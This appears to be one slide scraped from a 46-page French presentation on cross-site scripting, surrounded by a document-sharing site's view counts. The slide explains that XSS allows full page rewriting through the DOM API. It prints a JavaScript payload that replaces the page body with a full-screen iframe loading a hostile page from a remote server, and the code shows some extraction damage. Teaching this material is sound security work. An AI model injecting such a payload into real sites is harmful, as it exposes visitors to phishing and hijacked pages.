X hits on this document

161 views

0 shares

0 downloads

0 comments

6 / 46

XSS – de la brise à l'ouragan – I) Brise et revue d'armes – Le XSS, comment ça marche ? B) XSS et API DOM

Fondamental : une vulnérabilité XSS donne la possibilité de réécrire totalement une page, grâce à l'API DOM :

function a(){ var x=document.getElementById('exemple'); if(x!=null){ this.document.body.innerHTML="<iframe id=iframe_hostile name=iframe_hostile width=100% height=100% src=http://serveur distant/page hostile.htm ></i- frame>"; _ _

}else{ setTimeout('a()',400);

} } a();

Document info
Document views161
Page views170
Page last viewedMon Jan 23 02:33:19 UTC 2017
Pages46
Paragraphs417
Words3787

Comments